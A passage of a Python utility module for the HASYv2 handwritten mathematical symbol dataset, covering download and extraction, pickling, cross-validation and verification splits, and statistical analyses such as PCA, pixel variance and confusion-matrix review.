keys contain a 2D uint8 numpy array [[label]]\n\n \"\"\"\n # Download if not already done\n fname = 'HASYv2.tar.bz2'\n origin = 'https://zenodo.org/record/259444/files/HASYv2.tar.bz2'\n fpath = _get_file(fname, origin=origin,\n md5_hash='fddf23f36e24b5236f6b3a0880c778e3',\n cache_subdir='HASYv2')\n path = os.path.dirname(fpath)\n\n # Extract content if not already done\n untar_fpath = os.path.join(path, \"HASYv2\")\n if not os.path.exists(untar_fpath):\n print('Extract contents from archive...')\n tfile = tarfile.open(fpath, 'r:bz2')\n try:\n tfile.extractall(path=untar_fpath)\n except (Exception, KeyboardInterrupt) as e:\n if os.path.exists(untar_fpath):\n if os.path.isfile(untar_fpath):\n os.remove(untar_fpath)\n else:\n shutil.rmtree(untar_fpath)\n raise\n tfile.close()\n\n # Create pickle if not already done\n pickle_fpath = os.path.join(untar_fpath, \"hasy-data.pickle\")\n if not os.path.exists(pickle_fpath):\n # Load mapping from symbol names to indices\n symbol_csv_fpath = os.path.join(untar_fpath, \"symbols.csv\")\n symbol_id2index, labels = generate_index(symbol_csv_fpath)\n globals()[\"labels\"] = labels\n globals()[\"symbol_id2index\"] = symbol_id2index\n\n # Load data\n data_csv_fpath = os.path.join(untar_fpath, \"hasy-data-labels.csv\")\n data_csv = _load_csv(data_csv_fpath)\n x_compl = np.zeros((len(data_csv), 1, WIDTH, HEIGHT), dtype=np.uint8)\n y_compl = []\n s_compl = []\n path2index = {}\n\n # Load HASYv2 data\n for i, data_item in enumerate(data_csv):\n fname = os.path.join(untar_fpath, data_item['path'])\n s_compl.append(fname)\n x_compl[i, 0, :, :] = scipy.ndimage.imread(fname,\n flatten=False,\n mode='L')\n label = symbol_id2index[data_item['symbol_id']]\n y_compl.append(label)\n path2index[fname] = i\n y_compl = np.array(y_compl, dtype=np.int64)\n\n data = {'x': x_compl,\n 'y': y_compl,\n 's': s_compl,\n 'labels': labels,\n 'path2index': path2index}\n\n # Store data as pickle to speed up later calls\n with open(pickle_fpath, 'wb') as f:\n 
pickle.dump(data, f, protocol=pickle.HIGHEST_PROTOCOL)\n else:\n with open(pickle_fpath, 'rb') as f:\n data = pickle.load(f)\n globals()[\"labels\"] = data['labels']\n\n labels = data['labels']\n x_compl = data['x']\n y_compl = np.reshape(data['y'], (len(data['y']), 1))\n s_compl = data['s']\n path2index = data['path2index']\n\n if image_dim_ordering == 'tf':\n x_compl = x_compl.transpose(0, 2, 3, 1)\n\n if mode == 'complete':\n return {'x': x_compl, 'y': y_compl}\n elif mode.startswith('fold-'):\n fold = int(mode.split(\"-\")[1])\n if fold < 1 or fold > 10:\n raise NotImplementedError\n\n # Load fold\n fold_dir = os.path.join(untar_fpath,\n \"classification-task/fold-{}\".format(fold))\n train_csv_fpath = os.path.join(fold_dir, \"train.csv\")\n test_csv_fpath = os.path.join(fold_dir, \"test.csv\")\n train_csv = _load_csv(train_csv_fpath)\n test_csv = _load_csv(test_csv_fpath)\n\n train_ids = np.array([path2index[row['path']] for row in train_csv])\n test_ids = np.array([path2index[row['path']] for row in test_csv])\n\n x_train = x_compl[train_ids]\n x_test = x_compl[test_ids]\n y_train = y_compl[train_ids]\n y_test = y_compl[test_ids]\n s_train = [s_compl[id_] for id_ in train_ids]\n s_test = [s_compl[id_] for id_ in test_ids]\n\n data = {'x_train': x_train,\n 'y_train': y_train,\n 'x_test': x_test,\n 'y_test': y_test,\n 's_train': s_train,\n 's_test': s_test,\n 'labels': labels\n }\n return data\n elif mode == 'verification':\n # Load the data\n symbol_id2index = globals()[\"symbol_id2index\"]\n base_ = os.path.join(untar_fpath, \"verification-task\")\n\n # Load train data\n train_csv_fpath = os.path.join(base_, \"train.csv\")\n train_csv = _load_csv(train_csv_fpath)\n train_ids = np.array([path2index[row['path']] for row in train_csv])\n x_train = x_compl[train_ids]\n y_train = y_compl[train_ids]\n s_train = [s_compl[id_] for id_ in train_ids]\n\n # Load test data\n test1_csv_fpath = os.path.join(base_, 'test-v1.csv')\n test2_csv_fpath = os.path.join(base_, 
'test-v2.csv')\n test3_csv_fpath = os.path.join(base_, 'test-v3.csv')\n\n tmp1 = _load_images_verification_test(test1_csv_fpath,\n x_compl,\n path2index)\n tmp2 = _load_images_verification_test(test2_csv_fpath,\n x_compl,\n path2index)\n tmp3 = _load_images_verification_test(test3_csv_fpath,\n x_compl,\n path2index)\n data = {'train': {'x_train': x_train,\n 'y_train': y_train,\n 'source': s_train},\n 'test-v1': tmp1,\n 'test-v2': tmp2,\n 'test-v3': tmp3}\n return data\n else:\n raise NotImplementedError\n\n\ndef load_images(csv_filepath, symbol_id2index,\n one_hot=True,\n flatten=False,\n normalize=True,\n shuffle=True):\n \"\"\"\n Load the images into a 4D uint8 numpy array [index, y, x, depth].\n\n Parameters\n ----------\n csv_filepath : str\n 'test.csv' or 'train.csv'\n symbol_id2index : dict\n Dictionary generated by generate_index\n one_hot : bool, optional (default: True)\n Make label vector as 1-hot encoding, otherwise index\n flatten : bool, optional (default: False)\n Flatten feature vector\n normalize : bool, optional (default: True)\n Noramlize features to {0.0, 1.0}\n shuffle : bool, optional (default: True)\n Shuffle loaded data\n\n Returns\n -------\n images, labels, source :\n Images is a 4D uint8 numpy array [index, y, x, depth]\n and labels is a 2D uint8 numpy array [index][1-hot enc]\n and source is a list of file paths\n \"\"\"\n WIDTH, HEIGHT = 32, 32\n dataset_path = os.path.dirname(csv_filepath)\n data = _load_csv(csv_filepath)\n if flatten:\n images = np.zeros((len(data), WIDTH * HEIGHT))\n else:\n images = np.zeros((len(data), WIDTH, HEIGHT, 1))\n labels, sources = [], []\n for i, data_item in enumerate(data):\n fname = os.path.join(dataset_path, data_item['path'])\n sources.append(fname)\n if flatten:\n img = scipy.ndimage.imread(fname, flatten=False, mode='L')\n images[i, :] = img.flatten()\n else:\n images[i, :, :, 0] = scipy.ndimage.imread(fname,\n flatten=False,\n mode='L')\n label = symbol_id2index[data_item['symbol_id']]\n 
labels.append(label)\n # Make sure the type of images is float32\n images = np.array(images, dtype=np.float32)\n if normalize:\n images /= 255.0\n data = [images, np.array(labels), sources]\n if shuffle:\n perm = np.arange(len(labels))\n np.random.shuffle(perm)\n data[0] = data[0][perm]\n data[1] = data[1][perm]\n data[2] = [data[2][index] for index in perm]\n if one_hot:\n data = (data[0], np.eye(len(symbol_id2index))[data[1]], data[2])\n return data\n\n\ndef _load_images_verification_test(csv_filepath, x_compl, path2index):\n \"\"\"\n Load images from the verification test files.\n\n Parameters\n ----------\n csv_filepath : str\n Path to 'test-v1.csv' or 'test-v2.csv' or 'test-v3.csv'\n x_compl : numpy array\n Complete hasy data\n path2index : dict\n Map paths to indices of x_compl\n\n Returns\n -------\n list\n [x1s, x2s, labels, sources] where all four are lists of equal length\n x1s and x2s contain images,\n labels contains either True or False\n sources contains strings\n \"\"\"\n test1_csv = _load_csv(csv_filepath)\n test1_x1_ids = np.array([path2index[row['path1']]\n for row in test1_csv])\n test1_x2_ids = np.array([path2index[row['path2']]\n for row in test1_csv])\n test1_ys = np.array([row['is_same'] == 'True' for row in test1_csv],\n dtype=np.float64)\n test1_sources = [(row['path1'], row['path2']) for row in test1_csv]\n return {'X1s': x_compl[test1_x1_ids],\n 'X2s': x_compl[test1_x2_ids],\n 'ys': test1_ys,\n 'sources': test1_sources}\n\n\ndef _maybe_download(expected_files, work_directory='HASYv2'):\n \"\"\"\n Download the data, unless it is already there.\n\n Parameters\n ----------\n expected_files : list\n Each list contains a dict with keys 'filename', 'source', 'md5sum',\n where 'filename' denotes the local filename within work_directory,\n 'source' is an URL where the file can be downloaded and\n 'md5sum' is the expected MD5 sum of the file\n work_directory : str\n \"\"\"\n if not os.path.exists(work_directory):\n os.mkdir(work_directory)\n for 
entry in expected_files:\n filepath = os.path.join(work_directory, entry['filename'])\n logging.info(\"Search '%s'\", filepath)\n if not os.path.exists(filepath):\n filepath, _ = urllib.request.urlretrieve(entry['source'], filepath)\n statinfo = os.stat(filepath)\n logging.info('Successfully downloaded %s (%i bytes)'\n % (entry['filename'], statinfo.st_size))\n with open(filepath, 'rb') as f:\n md5sum_actual = hashlib.md5(f.read()).hexdigest()\n if md5sum_actual != entry['md5sum']:\n logging.error(\"File '%s' was expected to have md5sum %s, but \"\n \"has '%s'\",\n entry['filename'],\n entry['md5sum'],\n md5sum_actual)\n else:\n with open(filepath, 'rb') as f:\n md5sum_actual = hashlib.md5(f.read()).hexdigest()\n if md5sum_actual != entry['md5sum']:\n logging.error(\"File '%s' was expected to have md5sum %s, but \"\n \"has '%s'\",\n entry['filename'],\n entry['md5sum'],\n md5sum_actual)\n\n\ndef _maybe_extract(tarfile_path, work_directory):\n import tarfile\n hasy_tools_path = os.path.join(work_directory, \"hasy_tools.py\")\n if not os.path.isfile(hasy_tools_path):\n with tarfile.open(tarfile_path, \"r:bz2\") as tar:\n tar.extractall(path=work_directory)\n\n\ndef _get_data(dataset_path):\n \"\"\"\n Download data and extract it, if it is not already in dataset_path.\n\n Parameters\n ----------\n dataset_path : str\n \"\"\"\n filelist = [{'filename': 'HASYv2.tar.bz2',\n 'source': ('https://zenodo.org/record/259444/files/'\n 'HASYv2.tar.bz2'),\n 'md5sum': 'fddf23f36e24b5236f6b3a0880c778e3'}]\n _maybe_download(filelist, work_directory=dataset_path)\n tar_filepath = os.path.join(dataset_path, filelist[0]['filename'])\n _maybe_extract(tar_filepath, dataset_path)\n\n\ndef _is_valid_png(filepath):\n \"\"\"\n Check if the PNG image is valid.\n\n Parameters\n ----------\n filepath : str\n Path to a PNG image\n\n Returns\n -------\n bool : True if the PNG image is valid, otherwise False.\n \"\"\"\n try:\n test = Image.open(filepath)\n test.close()\n return True\n except:\n 
return False\n\n\ndef _verify_all(csv_data_path):\n \"\"\"Verify all PNG files in the training and test directories.\"\"\"\n train_data = _load_csv(csv_data_path)\n for data_item in train_data:\n if not _is_valid_png(data_item['path']):\n logging.info(\"%s is invalid.\" % data_item['path'])\n logging.info(\"Checked %i items of %s.\" %\n (len(train_data), csv_data_path))\n\n\ndef create_random_overview(img_src, x_images, y_images):\n \"\"\"Create a random overview of images.\"\"\"\n # Create canvas\n background = Image.new('RGB',\n (35 * x_images, 35 * y_images),\n (255, 255, 255))\n bg_w, bg_h = background.size\n # Paste image on canvas\n for x in range(x_images):\n for y in range(y_images):\n path = random.choice(img_src)['path']\n img = Image.open(path, 'r')\n img_w, img_h = img.size\n offset = (35 * x, 35 * y)\n background.paste(img, offset)\n # Draw lines\n draw = ImageDraw.Draw(background)\n for y in range(y_images): # horizontal lines\n draw.line((0, 35 * y - 2, 35 * x_images, 35 * y - 2), fill=0)\n for x in range(x_images): # vertical lines\n draw.line((35 * x - 2, 0, 35 * x - 2, 35 * y_images), fill=0)\n # Store\n background.save('hasy-overview.png')\n\n\ndef _get_colors(data, verbose=False):\n \"\"\"\n Get how often each color is used in data.\n\n Parameters\n ----------\n data : dict\n with key 'path' pointing to an image\n verbose : bool, optional\n\n Returns\n -------\n color_count : dict\n Maps a grayscale value (0..255) to how often it was in `data`\n \"\"\"\n color_count = {}\n for i in range(256):\n color_count[i] = 0\n for i, data_item in enumerate(data):\n if i % 1000 == 0 and i > 0 and verbose:\n print(\"%i of %i done\" % (i, len(data)))\n fname = os.path.join('.', data_item['path'])\n img = scipy.ndimage.imread(fname, flatten=False, mode='L')\n for row in img:\n for pixel in row:\n color_count[pixel] += 1\n return color_count\n\n\ndef data_by_class(data):\n \"\"\"\n Organize `data` by class.\n\n Parameters\n ----------\n data : list of dicts\n 
Each dict contains the key `symbol_id` which is the class label.\n\n Returns\n -------\n dbc : dict\n mapping class labels to lists of dicts\n \"\"\"\n dbc = {}\n for item in data:\n if item['symbol_id'] in dbc:\n dbc[item['symbol_id']].append(item)\n else:\n dbc[item['symbol_id']] = [item]\n return dbc\n\n\ndef _get_color_statistics(csv_filepath, verbose=False):\n \"\"\"\n Count how often white / black is in the image.\n\n Parameters\n ----------\n csv_filepath : str\n 'test.csv' or 'train.csv'\n verbose : bool, optional\n \"\"\"\n symbolid2latex = _get_symbolid2latex()\n data = _load_csv(csv_filepath)\n black_level, classes = [], []\n for symbol_id, elements in data_by_class(data).items():\n colors = _get_colors(elements)\n b = colors[0]\n w = colors[255]\n black_level.append(float(b) / (b + w))\n classes.append(symbol_id)\n if verbose:\n print(\"%s:\\t%0.4f\" % (symbol_id, black_level[-1]))\n print(\"Average black level: {:0.2f}%\"\n .format(np.average(black_level) * 100))\n print(\"Median black level: {:0.2f}%\"\n .format(np.median(black_level) * 100))\n print(\"Minimum black level: {:0.2f}% (class: {})\"\n .format(min(black_level),\n [symbolid2latex[c]\n for bl, c in zip(black_level, classes)\n if bl <= min(black_level)]))\n print(\"Maximum black level: {:0.2f}% (class: {})\"\n .format(max(black_level),\n [symbolid2latex[c]\n for bl, c in zip(black_level, classes)\n if bl >= max(black_level)]))\n\n\ndef _get_symbolid2latex(csv_filepath='symbols.csv'):\n \"\"\"Return a dict mapping symbol_ids to LaTeX code.\"\"\"\n symbol_data = _load_csv(csv_filepath)\n symbolid2latex = {}\n for row in symbol_data:\n symbolid2latex[row['symbol_id']] = row['latex']\n return symbolid2latex\n\n\ndef _analyze_class_distribution(csv_filepath,\n max_data,\n bin_size):\n \"\"\"Plot the distribution of training data over graphs.\"\"\"\n symbol_id2index, labels = generate_index(csv_filepath)\n index2symbol_id = {}\n for index, symbol_id in symbol_id2index.items():\n 
index2symbol_id[symbol_id] = index\n data, y, s = load_images(csv_filepath, symbol_id2index, one_hot=False)\n\n data = {}\n for el in y:\n if el in data:\n data[el] += 1\n else:\n data[el] = 1\n classes = data\n images = len(y)\n\n # Create plot\n print(\"Classes: %i\" % len(classes))\n print(\"Images: %i\" % images)\n\n class_counts = sorted([count for _, count in classes.items()])\n print(\"\\tmin: %i\" % min(class_counts))\n\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n # plt.title('HASY training data distribution')\n plt.xlabel('Amount of available testing images')\n plt.ylabel('Number of classes')\n\n # Where we want the ticks, in pixel locations\n ticks = [int(el) for el in list(np.linspace(0, max_data, 21))]\n # What those pixel locations correspond to in data coordinates.\n # Also set the float format here\n ax1.set_xticks(ticks)\n labels = ax1.get_xticklabels()\n plt.setp(labels, rotation=30)\n\n min_examples = 0\n ax1.hist(class_counts, bins=range(min_examples, max_data + 1, bin_size))\n # plt.show()\n filename = '{}.pdf'.format('data-dist')\n plt.savefig(filename)\n logging.info(\"Plot has been saved as {}\".format(filename))\n\n symbolid2latex = _get_symbolid2latex()\n\n top10 = sorted(classes.items(), key=lambda n: n[1], reverse=True)[:10]\n top10_data = 0\n for index, count in top10:\n print(\"\\t%s:\\t%i\" % (symbolid2latex[index2symbol_id[index]], count))\n top10_data += count\n total_data = sum([count for index, count in classes.items()])\n print(\"Top-10 has %i training data (%0.2f%% of total)\" %\n (top10_data, float(top10_data) * 100.0 / total_data))\n print(\"%i classes have more than %i data items.\" %\n (sum([1 for _, count in classes.items() if count > max_data]),\n max_data))\n\n\ndef _analyze_pca(csv_filepath):\n \"\"\"\n Analyze how much data can be compressed.\n\n Parameters\n ----------\n csv_filepath : str\n Path relative to dataset_path to a CSV file which points to images\n \"\"\"\n from sklearn.decomposition import PCA\n 
import itertools as it\n\n symbol_id2index, labels = generate_index(csv_filepath)\n data, y, s = load_images(csv_filepath, symbol_id2index, one_hot=False)\n data = data.reshape(data.shape[0], data.shape[1] * data.shape[2])\n pca = PCA()\n pca.fit(data)\n sum_ = 0.0\n done_values = [None, None, None]\n done_points = [False, False, False]\n chck_points = [0.9, 0.95, 0.99]\n for counter, el in enumerate(pca.explained_variance_ratio_):\n sum_ += el\n for check_point, done, i in zip(chck_points, done_points, it.count()):\n if not done and sum_ >= check_point:\n done_points[i] = counter\n done_values[i] = sum_\n for components, variance in zip(done_points, done_values):\n print(\"%i components explain %0.2f of the variance\" %\n (components, variance))\n\n\ndef _get_euclidean_dist(e1, e2):\n \"\"\"Calculate the euclidean distance between e1 and e2.\"\"\"\n e1 = e1.flatten()\n e2 = e2.flatten()\n return sum([(el1 - el2)**2 for el1, el2 in zip(e1, e2)])**0.5\n\n\ndef _inner_class_distance(data):\n \"\"\"Measure the eucliden distances of one class to the mean image.\"\"\"\n distances = []\n mean_img = None\n for e1 in data:\n fname1 = os.path.join('.', e1['path'])\n img1 = scipy.ndimage.imread(fname1, flatten=False, mode='L')\n if mean_img is None:\n mean_img = img1.tolist()\n else:\n mean_img += img1\n mean_img = mean_img / float(len(data))\n # mean_img = thresholdize(mean_img, 'auto')\n scipy.misc.imshow(mean_img)\n for e1 in data:\n fname1 = os.path.join('.', e1['path'])\n img1 = scipy.ndimage.imread(fname1, flatten=False, mode='L')\n dist = _get_euclidean_dist(img1, mean_img)\n distances.append(dist)\n\n return (distances, mean_img)\n\n\ndef thresholdize(img, threshold=0.5):\n \"\"\"Create a black-and-white image from a grayscale image.\"\"\"\n img_new = []\n if threshold == 'auto':\n img_flat = sorted(img.flatten())\n threshold_ind = int(0.85 * len(img_flat))\n threshold = img_flat[threshold_ind]\n for row in img:\n bla = []\n for col in row:\n if col > threshold:\n 
bla.append(1)\n else:\n bla.append(0)\n img_new.append(bla)\n return np.array(img_new)\n\n\ndef _analyze_distances(csv_filepath):\n \"\"\"Analyze the distance between elements of one class and class means.\"\"\"\n symbolid2latex = _get_symbolid2latex()\n data = _load_csv(csv_filepath)\n data = data_by_class(data)\n mean_imgs = []\n for class_, data_class in data.items():\n latex = symbolid2latex[class_]\n d, mean_img = _inner_class_distance(data_class)\n # scipy.misc.imshow(mean_img)\n print(\"%s: min=%0.4f, avg=%0.4f, median=%0.4f max=%0.4f\" %\n (latex, np.min(d), np.average(d), np.median(d), np.max(d)))\n distarr = sorted([(label, mean_c, _get_euclidean_dist(mean_c,\n mean_img))\n for label, mean_c in mean_imgs],\n key=lambda n: n[2])\n for label, mean_c, d in distarr:\n print(\"\\t%s: %0.4f\" % (label, d))\n mean_imgs.append((latex, mean_img))\n\n\ndef _analyze_variance(csv_filepath):\n \"\"\"Calculate the variance of each pixel.\"\"\"\n symbol_id2index, labels = generate_index(csv_filepath)\n data, y, s = load_images(csv_filepath, symbol_id2index, one_hot=False)\n # Calculate mean\n sum_ = np.zeros((32, 32))\n for el in data:\n el = np.squeeze(el)\n sum_ += el\n mean_ = sum_ / float(len(data))\n scipy.misc.imshow(mean_)\n\n # Calculate variance\n centered_ = np.zeros((32, 32))\n for el in data:\n el = np.squeeze(el)\n centered_ += (el - mean_)**2\n centered_ = (1. 
/ len(data)) * centered_**0.5\n scipy.misc.imshow(centered_)\n for row in list(centered_):\n row = list(row)\n print(\" \".join([\"%0.1f\" % nr for nr in row]))\n\n\ndef _analyze_correlation(csv_filepath):\n \"\"\"\n Analyze and visualize the correlation of features.\n\n Parameters\n ----------\n csv_filepath : str\n Path to a CSV file which points to images\n \"\"\"\n import pandas as pd\n from matplotlib import pyplot as plt\n from matplotlib import cm as cm\n\n symbol_id2index, labels = generate_index(csv_filepath)\n data, y, s = load_images(csv_filepath,\n symbol_id2index,\n one_hot=False,\n flatten=True)\n df = pd.DataFrame(data=data)\n\n logging.info(\"Data loaded. Start correlation calculation. Takes 1.5h.\")\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n\n # Where we want the ticks, in pixel locations\n ticks = np.linspace(0, 1024, 17)\n # What those pixel locations correspond to in data coordinates.\n # Also set the float format here\n ax1.set_xticks(ticks)\n ax1.set_yticks(ticks)\n labels = ax1.get_xticklabels()\n plt.setp(labels, rotation=30)\n\n cmap = cm.get_cmap('viridis', 30)\n cax = ax1.imshow(df.corr(), interpolation=\"nearest\", cmap=cmap)\n ax1.grid(True)\n # Add colorbar, make sure to specify tick locations to match desired\n # ticklabels\n fig.colorbar(cax, ticks=[-0.15, 0, 0.15, 0.30, 0.45, 0.60, 0.75, 0.90, 1])\n filename = '{}.pdf'.format('feature-correlation')\n plt.savefig(filename)\n\n\ndef _create_stratified_split(csv_filepath, n_splits):\n \"\"\"\n Create a stratified split for the classification task.\n\n Parameters\n ----------\n csv_filepath : str\n Path to a CSV file which points to images\n n_splits : int\n Number of splits to make\n \"\"\"\n from sklearn.model_selection import StratifiedKFold\n data = _load_csv(csv_filepath)\n labels = [el['symbol_id'] for el in data]\n skf = StratifiedKFold(labels, n_folds=n_splits)\n i = 1\n kdirectory = 'classification-task'\n if not os.path.exists(kdirectory):\n os.makedirs(kdirectory)\n 
for train_index, test_index in skf:\n print(\"Create fold %i\" % i)\n directory = \"%s/fold-%i\" % (kdirectory, i)\n if not os.path.exists(directory):\n os.makedirs(directory)\n else:\n print(\"Directory '%s' already exists. Please remove it.\" %\n directory)\n i += 1\n train = [data[el] for el in train_index]\n test_ = [data[el] for el in test_index]\n for dataset, name in [(train, 'train'), (test_, 'test')]:\n with open(\"%s/%s.csv\" % (directory, name), 'wb') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(('path', 'symbol_id', 'latex', 'user_id'))\n for el in dataset:\n csv_writer.writerow((\"../../%s\" % el['path'],\n el['symbol_id'],\n el['latex'],\n el['user_id']))\n\n\ndef _create_pair(r1_data, r2_data):\n \"\"\"Create a pair for the verification test.\"\"\"\n symbol_index = random.choice(r1_data.keys())\n r1 = random.choice(r1_data[symbol_index])\n is_same = random.choice([True, False])\n if is_same:\n symbol_index2 = symbol_index\n r2 = random.choice(r1_data[symbol_index2])\n else:\n symbol_index2 = random.choice(r2_data.keys())\n while symbol_index2 == symbol_index:\n symbol_index2 = random.choice(r2_data.keys())\n r2 = random.choice(r2_data[symbol_index2])\n return (r1['path'], r2['path'], is_same)\n\n\ndef _create_verification_task(sample_size=32, test_size=0.05):\n \"\"\"\n Create the datasets for the verification task.\n\n Parameters\n ----------\n sample_size : int\n Number of classes which will be taken completely\n test_size : float in (0, 1)\n Percentage of the remaining data to be taken to test\n \"\"\"\n # Get the data\n data = _load_csv('hasy-data-labels.csv')\n for el in data:\n el['path'] = \"../hasy-data/\" + el['path'].split(\"hasy-data/\")[1]\n data = sorted(data_by_class(data).items(),\n key=lambda n: len(n[1]),\n reverse=True)\n symbolid2latex = _get_symbolid2latex()\n\n # Get complete classes\n symbols = random.sample(range(len(data)), k=sample_size)\n symbols = sorted(symbols, reverse=True)\n test_data_excluded 
= []\n for symbol_index in symbols:\n # for class_label, items in data:\n class_label, items = data.pop(symbol_index)\n test_data_excluded += items\n print(symbolid2latex[class_label])\n\n # Get data from remaining classes\n data_n = []\n for class_label, items in data:\n data_n = data_n + items\n ys = [el['symbol_id'] for el in data_n]\n x_train, x_test, y_train, y_test = train_test_split(data_n,\n ys,\n test_size=test_size)\n\n # Write the training / test data\n print(\"Test data (excluded symbols) = %i\" % len(test_data_excluded))\n print(\"Test data (included symbols) = %i\" % len(x_test))\n print(\"Test data (total) = %i\" % (len(x_test) + len(test_data_excluded)))\n kdirectory = 'verification-task'\n if not os.path.exists(kdirectory):\n os.makedirs(kdirectory)\n with open(\"%s/train.csv\" % kdirectory, 'wb') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(('path', 'symbol_id', 'latex', 'user_id'))\n for el in x_train:\n csv_writer.writerow((el['path'],\n el['symbol_id'],\n el['latex'],\n el['user_id']))\n\n x_test_inc_class = data_by_class(x_test)\n x_text_exc_class = data_by_class(test_data_excluded)\n # V1: Both symbols belong to the training set (included symbols)\n with open(\"%s/test-v1.csv\" % kdirectory, 'wb') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(('path1', 'path2', 'is_same'))\n for i in range(100000):\n test_data_tuple = _create_pair(x_test_inc_class, x_test_inc_class)\n csv_writer.writerow(test_data_tuple)\n\n # V2: r1 belongs to a symbol in the training set, but r2 might not\n with open(\"%s/test-v2.csv\" % kdirectory, 'wb') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(('path1', 'path2', 'is_same'))\n for i in range(100000):\n test_data_tuple = _create_pair(x_test_inc_class, x_text_exc_class)\n csv_writer.writerow(test_data_tuple)\n\n # V3: r1 and r2 both don't belong to symbols in the training set\n with open(\"%s/test-v3.csv\" % kdirectory, 'wb') as csv_file:\n 
csv_writer = csv.writer(csv_file)\n csv_writer.writerow(('path1', 'path2', 'is_same'))\n for i in range(100000):\n test_data_tuple = _create_pair(x_text_exc_class, x_text_exc_class)\n csv_writer.writerow(test_data_tuple)\n\n\ndef _count_users(csv_filepath):\n \"\"\"\n Count the number of users who contributed to the dataset.\n\n Parameters\n ----------\n csv_filepath : str\n Path to a CSV file which points to images\n \"\"\"\n data = _load_csv(csv_filepath)\n user_ids = {}\n for el in data:\n if el['user_id'] not in user_ids:\n user_ids[el['user_id']] = [el['path']]\n else:\n user_ids[el['user_id']].append(el['path'])\n max_els = 0\n max_user = 0\n for user_id, elements in user_ids.items():\n if len(elements) > max_els:\n max_els = len(elements)\n max_user = user_id\n print(\"Dataset has %i users.\" % len(user_ids))\n print(\"User %s created most (%i elements, %0.2f%%)\" %\n (max_user, max_els, float(max_els) / len(data) * 100.0))\n\n\ndef _analyze_cm(cm_file, total_symbols=100):\n \"\"\"\n Analyze a confusion matrix.\n\n Parameters\n ----------\n cm_file : str\n Path to a confusion matrix in JSON format.\n Each line contains a list of non-negative integers.\n cm[i][j] indicates how often members of class i were labeled with j\n \"\"\"\n symbolid2latex = _get_symbolid2latex()\n symbol_id2index, labels = generate_index('hasy-data-labels.csv')\n index2symbol_id = {}\n for index, symbol_id in symbol_id2index.items():\n index2symbol_id[symbol_id] = index\n\n # Load CM\n with open(cm_file) as data_file:\n cm = json.load(data_file)\n class_accuracy = []\n n = len(cm)\n test_samples_sum = np.sum(cm)\n # Number of recordings for symbols which don't have a single correct\n # prediction\n sum_difficult_none = 0\n # Number of recordings for symbols which have an accuracy of less than 5%\n sum_difficult_five = 0\n for i in range(n):\n total = sum([cm[i][j] for j in range(n)])\n class_accuracy.append({'class_index': i,\n 'class_accuracy': float(cm[i][i]) / total,\n 
'class_confusion_index': np.argmax(cm[i]),\n 'correct_total': cm[i][i],\n 'class_total': total})\n print(\"Lowest class accuracies:\")\n class_accuracy = sorted(class_accuracy, key=lambda n: n['class_accuracy'])\n index2latex = lambda n: symbolid2latex[index2symbol_id[n]]\n for i in range(total_symbols):\n if class_accuracy[i]['correct_total'] == 0:\n sum_difficult_none += class_accuracy[i]['class_total']\n if class_accuracy[i]['class_accuracy'] < 0.05:\n sum_difficult_five += class_accuracy[i]['class_total']\n latex_orig = index2latex(class_accuracy[i]['class_index'])\n latex_conf = index2latex(class_accuracy[i]['class_confusion_index'])\n # print(\"\\t%i. \\t%s:\\t%0.4f (%s); correct=%i\" %\n # (i + 1,\n # latex_orig,\n # class_accuracy[i]['class_accuracy'],\n # latex_conf,\n # class_accuracy[i]['correct_total']))\n print((\"\\t\\\\verb+{:<15}+ & ${:<15}$ & {:<15} & \\\\verb+{:<15}+ \"\n \"& ${:<15}$ \\\\\\\\ ({})\").format\n (latex_orig, latex_orig,\n class_accuracy[i]['class_total'],\n latex_conf, latex_conf,\n class_accuracy[i]['correct_total']))\n print(\"Non-correct: %0.4f%%\" %\n (sum_difficult_none / float(test_samples_sum)))\n print(\"five-correct: %0.4f%%\" %\n (sum_difficult_five / float(test_samples_sum)))\n\n print(\"Easy classes\")\n class_accuracy = sorted(class_accuracy,\n key=lambda n: n['class_accuracy'],\n reverse=True)\n for i in range(total_symbols):\n latex_orig = index2latex(class_accuracy[i]['class_index'])\n latex_conf = index2latex(class_accuracy[i]['class_confusion_index'])\n if class_accuracy[i]['class_accuracy'] < 0.99:\n break\n # print(\"\\t%i. 
\\t%s:\\t%0.4f (%s); correct=%i\" %\n # (i + 1,\n # latex_orig,\n # class_accuracy[i]['class_accuracy'],\n # latex_conf,\n # class_accuracy[i]['correct_total']))\n print((\"\\t\\\\verb+{:<15}+ & ${:<15}$ & {:<15} & \"\n \"\\\\verb+{:<15}+ & ${:<15}$ \\\\\\\\ ({})\").format\n (latex_orig, latex_orig,\n class_accuracy[i]['class_total'],\n latex_conf, latex_conf,\n class_accuracy[i]['correct_total']))\n # cm = np.array(cm)\n # scipy.misc.imshow(cm)\n\n\ndef preprocess(x):\n \"\"\"Preprocess features.\"\"\"\n x = x.astype('float32')\n x /= 255.0\n return x\n\n\ndef _get_parser():\n \"\"\"Get parser object for hasy_tools.py.\"\"\"\n import argparse\n from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter\n parser = ArgumentParser(description=__doc__,\n formatter_class=ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--dataset\",\n dest=\"dataset\",\n help=\"specify which data to use\")\n parser.add_argument(\"--verify\",\n dest=\"verify\",\n action=\"store_true\",\n default=False,\n help=\"verify PNG files\")\n parser.add_argument(\"--overview\",\n dest=\"overview\",\n action=\"store_true\",\n default=False,\n help=\"Get overview of data\")\n parser.add_argument(\"--analyze_color\",\n dest=\"analyze_color\",\n action=\"store_true\",\n default=False,\n help=\"Analyze the color distribution\")\n parser.add_argument(\"--class_distribution\",\n dest=\"class_distribution\",\n action=\"store_true\",\n default=False,\n help=\"Analyze the class distribution\")\n parser.add_argument(\"--distances\",\n dest=\"distances\",\n action=\"store_true\",\n default=False,\n help=\"Analyze the euclidean distance distribution\")\n parser.add_argument(\"--pca\",\n dest=\"pca\",\n action=\"store_true\",\n default=False,\n help=(\"Show how many principal components explain \"\n \"90%% / 95%% / 99%% of the variance\"))\n parser.add_argument(\"--variance\",\n dest=\"variance\",\n action=\"store_true\",\n default=False,\n help=\"Analyze the variance of features\")\n 
